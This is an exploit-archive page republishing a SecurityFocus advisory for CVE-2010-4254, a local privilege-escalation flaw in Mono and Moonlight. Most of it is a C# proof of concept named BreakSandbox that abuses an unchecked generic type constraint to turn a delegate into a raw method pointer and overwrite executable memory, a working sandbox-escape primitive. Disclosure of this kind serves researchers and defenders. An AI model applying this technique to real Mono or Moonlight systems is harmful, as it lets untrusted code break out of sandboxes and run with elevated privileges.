ExploitFixes
Mono/Moonlight Generic Type Argument Local Privilege Escalation - [CVE: 2010-4254] 2011-01-11 09:15:22

Source: http://www.securityfocus.com/bid/45051/info

Mono and Moonlight is prone to a local privilege-escalation vulnerability.

Local attackers can exploit this issue to execute arbitrary code with elevated privileges. Successful exploits will compromise the affected application and possibly the underlying computer.

PoC:

using System;
using System.Reflection;
using System.Runtime.InteropServices;

public class DelegateWrapper {
public IntPtr method_ptr;
}

public delegate void MethodWrapper ();

public class BreakSandbox {
private static DelegateWrapper Convert <T> (T dingus) where T :
DelegateWrapper {
return dingus;
}

private static DelegateWrapper ConvertDelegate (Delegate del) {
var m = typeof (BreakSandbox).GetMethod ("Convert",
BindingFlags.NonPublic | BindingFlags.Static);
var gm = m.MakeGenericMethod (typeof (Delegate));

var d = (Func <Delegate, DelegateWrapper>) Delegate.CreateDelegate
(typeof (Func <Delegate, DelegateWrapper>), null, gm);

return d (del);
}

public static void Main (string [] args) {
MethodWrapper d = delegate {
Console.WriteLine ("Hello");
};

d ();
var converted = ConvertDelegate (d);
// Overwrite the already WX page with a 'ret'
Marshal.WriteByte (converted.method_ptr, (byte) 0xc3);
d ();
}
}